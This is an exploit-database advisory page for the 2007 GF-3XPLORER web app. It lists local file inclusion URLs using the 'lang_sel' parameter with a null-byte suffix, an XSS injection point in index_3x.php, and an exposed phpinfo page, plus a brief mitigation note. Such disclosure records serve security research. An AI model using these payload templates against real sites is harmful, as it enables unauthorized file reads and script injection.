Local File Inclusion & Full Path Disclosure

vendor:

by:

MhZ91

5.5

CVSS

MEDIUM

Local File Inclusion & Full Path Disclosure

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Local File Inclusion & Full Path Disclosure

This exploit allows an attacker to include local files and disclose full file paths on the target system. The vulnerability can be exploited through the 'updater.php' and 'thumber.php' files by manipulating the 'lang_sel' parameter. Additionally, there are other XSS vulnerabilities present in the 'index_3x.php' file. The script 'phpinfo.php' can be used to view phpinfo() on the target system.

Mitigation:

To mitigate this vulnerability, ensure that the 'magic_quotes_gpc' setting is enabled in the PHP configuration. Additionally, sanitize and validate all user-supplied input before using it in file inclusion or path disclosure functions.

Source

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                           
---------------------------------------------------------------

Http://www.inj3ct-it.org	    Staff[at]inj3ct-it[dot]org	

---------------------------------------------------------------

	Local File Inclusion & Full Path Discolusure

---------------------------------------------------------------

# Author: MhZ91 nobody.91@hotmail.it 

# Download script: http://sourceforge.net/projects/gf-3xplorer/

# magic_quotes_gpc = Off

# Exploit 

# http://[site]/[path]/updater.php?lang_sel=[LFI]%00

# http://[site]/[path]/thumber.php?lang_sel=[LFI]%00

---------------------------------------------------------------

# Xss

# http://[site]/[path]/index_3x.php?newdir=">[Xss]

# And other more..

---------------------------------------------------------------

# phpinfo(); View

# http://[site]/GF-3XPLORER/explorer/phpinfo.php

---------------------------------------------------------------

# milw0rm.com [2007-12-18]